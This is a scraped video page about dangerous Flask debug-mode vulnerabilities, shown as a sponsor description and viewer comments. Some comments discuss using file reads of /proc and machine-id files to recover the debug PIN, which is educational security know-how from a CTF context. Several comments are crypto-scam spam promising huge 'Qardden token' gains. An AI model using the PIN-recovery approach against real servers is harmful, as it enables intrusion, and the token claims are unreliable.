DANGEROUS Python Flask Debug Mode Vulnerabilities
HTML-код
- Опубликовано: 10 сен 2024
- Snyk is the sponsor for this video and deserves some love, try it out to find vulnerabilities in your own applications! j-h.io/snyk
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeac...
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2au...
⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
👨🏻💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humbleb...
🐶Snyk ➡ j-h.io/snyk
🤹♀️SkillShare ➡ j-h.io/skillshare
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsor...
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc
Snyk is the sponsor for this video and deserves some love, try it out to find vulnerabilities in your own applications! j-h.io/snyk
sneak hm...snük
This one really hits home because I use flask for most my projects.
# in a url is a page anchor. Like for a long webpage, clicking the link will jump to a specific section of the webpage. It's ignore for the actual file retrieval portion of the request
Fun fact, it's client-side only. This is how sites like Mega and Wormhole can include encryption keys in links that never get sent to the server (provided the JavaScript on the page is safe).
Yeah this is extremely DANGEROUS - by the way, doors are very unsafe, too. If you leave them open, any burglar can simply walk right into your house. Scandal!
Yes! The Legend!! :D Interesting with the debug mode.. Heard of it in Flask but never encountered it :)
I'm actually curious; if we have arbitrary file read, can't we read the stdout or stderr of the flask server and get the PIN from /proc/self/fd/{1,2} instead?
Update: we probably cannot do that because the process is still running and the stdout stream is not terminated by an eof, which means the when the file is being read, it's likely gonna wait for the eof, but that will never happen until the process terminates, so the request hangs.
Depends on of and when the program flushes the buffer. Take tail -f for example.
@@seanvinsick5271 true, someone should patch the `flask run` command to flush stderr after it prints the pin..
Your videos improved a lot. I like that you are straightforward on what's really going on.
Thanks !
The bit after # in an URL is called a fragment
Hey John, just wanted to say one thing that the snake in the thumbnail is not python but a bush viper.
unwatchable
Thanks John ! Just realized I miss your old outro music so I went to some previous video and enjoyed 😛
Qardden token and amazon signed a partnership. It will blow up once it hits mainstream.
by any ans, but I can make what I envision, and that's the greatest gift to . You are, without a doubt, an expert teacher. You may
That was very cool John!! I am working on a Flask for Python web app. This video gave me great insight in some security issues! Thanks!
cool.. what web app are you building
Awesome... enjoyed this.... starting to understand more of your hacks as I learn about building web apps
Interesting
big fan from NetworkChuck
12:58 You could try if the console is already usable while just hidden behind the PIN because it's rendered, so maybe if you just remove the pin input popup from the DOM you could use the console?
tried it and it for some reason just shows the 404 error thing whenever you try something
and when you have a page called console it'll show what you made that do
Love love love the clear video quality and content
Your next level bro
Awesome video. I am making a flask app exploitation tool and I will add that for sure.
Nice learning some new python tricks :D
I honestly only use flask as the python equivalent to express, make rest api's or websocket servers, backend stuff, but always turn off debug mode in prod
How can I find the docker image please 💜
Why isn't the debug pin just a random number? Trying to be too clever?
Nice one John and thank you for this content.
Short and easy thank you
there are more than 10 users in my machine, how can I see which run the script ?
the /proc and /sys folders almost look like magic
Why dont u shorten the URL (valid SSL as it will use that shortener s SSL) and put your payload in the shorter??? how's that gonna work out
@@priyapepsi It will redirect it immediately to the local service ,try it.
Thank you John Hammond I will have checked out my python in learning this and have I got the right hack the Box I can't get it to Lead the first time and when it does it doesn't look right
'John... John!! I can't get Jurassic Park back online without Dennis Nedry."💻🖥🚨⚡⚡🦎🦕🦖
I believe qardden token will go 100x after launch on Binance
Vulnerabilites? In debug mode? Who would have thought of that... SAID NO ONE!!!!
I'm confused about a day. with this encoding stuffs and keys.
I'm stuck on htb agile in this part😮
Any thoughts about Qardden Token? I myself think it's the best thing since sliced bread.
💜Jhon Hammond 💙
Big fan sir
John Hammond: Do you have any idea why people found your challenge hard? I for one don't know much about all those things about the /proc file system, for example.
Great video!
From which website i can download this wokerbee docker file??
that video is sooo cool :)
Can you search for this with shodan?
Walmart and Qardden token just signed a collaboration??
Hey John, please, reduce the brightness of your screen! It will damage your eyes.
"tack tack SSL"
... Did you happen to play EVE online at some point?
👍👍John!
😍
Qardden token will moonshoot after CEX listing..
This will almost never happen with Blazor...Because C# leaves less open doors to vulnerabilities in the code.
..my opinion of course...lol
I exploited this miss configuration months ago lol. has this "vulnerability" only now been officially discovered? Because if that's the case, I discovered them months ago first
He said in the begging that this is from a CTF he made a while ago.
@@WashingtonFernandes oh True
There's a few blog demonstrating this dating back from 2020, cool how this can be done.
I think this is already patched in python 3.9 and the new flask version, the pin reverse engineering script is not working
lmao yeah makes sense that the flask people wont just let a vulnerability hang in there for too long
Sabari inn more information on this video
Whats updog?
wow this looked like a really fun challenge! I should get into doing more ctf stuff, i did picoCTF back in 2019 at my highschool, and it was an absolute blast! (i had the highest score out of my entire school with im proud of, binary exploitation, web exploitation, and the stenography challenges were my favorite)
Just telling u went to tor to search but everything is all on the open web
105 iam
I believe qardden Token will change E-commerce forever. Thank me later!
first
Literally doesn't care.
qardden Token is launching, 1000x gains. Thank me later...
Im getting 2 different machine ids
machine-id = 43c2ab1e-6cbd-4642-a70b-cbcfe418d38a # /proc/sys/kernel/random/boot_id
machine-id2 = ed5b159560f54721827644bc9b220d00 #/etc/machine-id
I dont even have 2 months learning to hack but after learning XSS I realized that if python can be build a website then it can definitely come with so many more bugs.... this is a confirmation for me that I am on the right path on Hacking....CURIOCITY_IS_THE_LEADER_IN_HACKING